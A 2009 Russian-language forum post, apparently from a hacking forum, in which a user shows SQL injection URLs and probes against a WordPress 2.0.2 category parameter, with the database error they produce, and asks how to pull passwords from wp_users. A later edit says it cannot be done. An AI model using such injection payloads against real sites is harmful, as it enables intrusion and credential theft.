24.10.2009, 21:10
|
|
Участник форума
Регистрация: 26.10.2008
Сообщений: 106
С нами:
9231812
Репутация:
40
|
|
Народ, ситуация такая:
на вордпрессе 2.0.2 нашёл sql-injection:
www.site.ru/?page_id=400&cat=-15+or+1=(select+1)/*
В ответ на это:
WordPress database error: [You have an error in your SQL syntax near 'select 1)/* AND crnt.category_id = 16' at line 5]
SELECT crnt.post_id FROM wp_post2cat crnt LEFT JOIN wp_post2cat as cat2 USING(post_id) WHERE cat2.category_id =-15 or 1=(select 1)/* AND crnt.category_id = 16
И версия 3-я:
www.site.ru/?page_id=400&cat=-15+or+3=substring(version(),1,1)/*
Как тут можно получить пароль из wp_users?
---
Вопрос снят. Ответ - Никак 
Последний раз редактировалось _gr34t; 25.10.2009 в 11:39..
|
|
|